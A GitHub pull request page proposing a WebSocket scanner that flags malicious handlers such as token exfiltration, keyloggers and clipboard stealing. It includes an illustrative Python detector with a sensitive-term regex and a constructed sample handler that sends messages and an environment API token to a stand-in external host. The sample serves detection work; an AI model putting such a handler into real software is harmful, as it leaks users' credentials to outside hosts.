feat: add WebSocket scanner for malicious handlers #24

Open
idiottrader wants to merge 1 commit into counterspec:main from idiottrader:websocket-scanner

@idiottrader

Summary

This PR adds a WebSocket security scanner for ISNAD as requested in #3.

Features

  • ✅ Detects 7 malicious WebSocket patterns:
    • Unauthenticated connections
    • Data exfiltration (passwords, tokens)
    • External data forwarding
    • Stealth connections
    • Keylogger patterns
    • Clipboard stealing
    • Session hijacking
  • ✅ JavaScript/TypeScript support
  • ✅ Python support (ast + regex)
  • ✅ Threat level classification (Critical/High/Medium/Low)
  • ✅ Confidence scoring
  • ✅ JSON/SARIF output support
  • ✅ CLI interface

Usage

# Scan single file
python websocket_scanner.py ./suspicious.js

# Scan directory
python websocket_scanner.py ./src/

# Output report
python websocket_scanner.py ./src/ --output report.json

Test Coverage

  • Unit tests for all 7 detection patterns
  • Integration tests for JS/TS and Python
  • Manual testing on sample malicious packages

Closes #3
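
A sketch of how two of the patterns listed above (external data forwarding and data exfiltration) can be checked in Python sources with `ast` plus a regex. This is an added illustration, not the code from this PR; the rule names, threat levels, confidence values and the sample handler are constructed assumptions.

```python
import ast
import re

# Constructed rule data (assumptions, not the PR's rules or scores).
SENSITIVE = re.compile(r"password|passwd|token|cookie|clipboard|secret", re.I)
LOCAL = re.compile(r"^wss?://(localhost|127\.0\.0\.1|\[::1\])([:/]|$)", re.I)

# Constructed sample: a handler that relays traffic and a token off-host.
SAMPLE = '''\
import os, websockets

async def handler(ws):
    async for msg in ws:
        async with websockets.connect("wss://collector.example.net/in") as out:
            await out.send(msg)
            await out.send(os.environ["API_TOKEN"])

async def health():
    async with websockets.connect("ws://localhost:8765") as ws:
        await ws.send("ping")
'''


def _callee(call):
    """Last name of the called function: 'send' for ws.send(...)."""
    f = call.func
    return f.attr if isinstance(f, ast.Attribute) else getattr(f, "id", "")


def scan_python(source, filename="<constructed>"):
    """Return findings for two patterns, ordered by line number."""
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        if not isinstance(node, ast.Call) or not node.args:
            continue
        arg = node.args[0]
        if _callee(node) == "connect":
            # External forwarding: literal ws/wss URL that is not loopback.
            url = arg.value if isinstance(arg, ast.Constant) else None
            if isinstance(url, str) and re.match(r"wss?://", url, re.I) and not LOCAL.match(url):
                findings.append({"rule": "external-forwarding", "line": node.lineno,
                                 "level": "High", "confidence": 0.6, "evidence": url})
        elif _callee(node) == "send":
            # Exfiltration: the sent expression names something sensitive.
            hit = SENSITIVE.search(ast.unparse(arg))
            if hit:
                findings.append({"rule": "data-exfiltration", "line": node.lineno,
                                 "level": "Critical", "confidence": 0.8, "evidence": hit.group(0)})
    return sorted(findings, key=lambda f: f["line"])
```

Both checks are lexical: a URL assembled at runtime, or a secret passed through a neutrally named variable, is not seen, so a finding here is a lead for review and not a verdict.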

@vercel

vercel bot commented Feb 28, 2026

@idiottrader is attempting to deploy a commit to the Rapi's projects Team on Vercel.

A member of the Team first needs to authorize it.

Development

Successfully merging this pull request may close these issues.

Scanner rule for malicious WebSocket handlers